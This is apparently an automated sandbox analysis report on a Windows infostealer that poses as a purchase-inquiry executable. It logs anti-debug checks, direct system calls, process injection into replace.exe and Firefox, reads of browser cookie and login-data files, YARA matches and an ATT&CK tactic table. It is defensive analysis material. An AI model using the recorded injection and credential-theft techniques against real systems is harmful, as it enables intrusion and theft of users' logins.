                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9866E mov eax, dword ptr fs:[00000030h]4_2_00F9866E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEC640 mov eax, dword ptr fs:[00000030h]4_2_00EEC640
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED262C mov eax, dword ptr fs:[00000030h]4_2_00ED262C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE627 mov eax, dword ptr fs:[00000030h]4_2_00EEE627
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F06620 mov eax, dword ptr fs:[00000030h]4_2_00F06620
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08620 mov eax, dword ptr fs:[00000030h]4_2_00F08620
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12619 mov eax, dword ptr fs:[00000030h]4_2_00F12619
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E609 mov eax, dword ptr fs:[00000030h]4_2_00F4E609
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF27ED mov eax, dword ptr fs:[00000030h]4_2_00EF27ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF27ED mov eax, dword ptr fs:[00000030h]4_2_00EF27ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF27ED mov eax, dword ptr fs:[00000030h]4_2_00EF27ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5E7E1 mov eax, dword ptr fs:[00000030h]4_2_00F5E7E1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED47FB mov eax, dword ptr fs:[00000030h]4_2_00ED47FB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED47FB mov eax, dword ptr fs:[00000030h]4_2_00ED47FB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDC7C0 mov eax, dword ptr fs:[00000030h]4_2_00EDC7C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F507C3 mov eax, dword ptr fs:[00000030h]4_2_00F507C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED07AF mov eax, dword ptr fs:[00000030h]4_2_00ED07AF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F847A0 mov eax, dword ptr fs:[00000030h]4_2_00F847A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7678E mov eax, dword ptr fs:[00000030h]4_2_00F7678E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8770 mov eax, dword ptr fs:[00000030h]4_2_00ED8770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F54755 mov eax, dword ptr fs:[00000030h]4_2_00F54755
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12750 mov eax, dword ptr fs:[00000030h]4_2_00F12750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12750 mov eax, dword ptr fs:[00000030h]4_2_00F12750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5E75D mov eax, dword ptr fs:[00000030h]4_2_00F5E75D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0750 mov eax, dword ptr fs:[00000030h]4_2_00ED0750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0674D mov esi, dword ptr fs:[00000030h]4_2_00F0674D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0674D mov eax, dword ptr fs:[00000030h]4_2_00F0674D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0674D mov eax, dword ptr fs:[00000030h]4_2_00F0674D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4C730 mov eax, dword ptr fs:[00000030h]4_2_00F4C730
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0273C mov eax, dword ptr fs:[00000030h]4_2_00F0273C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0273C mov ecx, dword ptr fs:[00000030h]4_2_00F0273C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0273C mov eax, dword ptr fs:[00000030h]4_2_00F0273C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Memory written: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Section loaded: NULL target: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\replace.exe | Section loaded: NULL target: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe protection: read write
                Source: C:\Windows\SysWOW64\replace.exe | Section loaded: NULL target: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\replace.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\replace.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\replace.exe | Thread register set: target process: 7876
                Source: C:\Windows\SysWOW64\replace.exe | Thread APC queued: target process: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Process created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Process created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe | Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
                Source: C:\Windows\SysWOW64\replace.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Queries volume information: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe VolumeInformation
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
                Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1439477334.00000000091B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\replace.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1439477334.00000000091B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                31
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
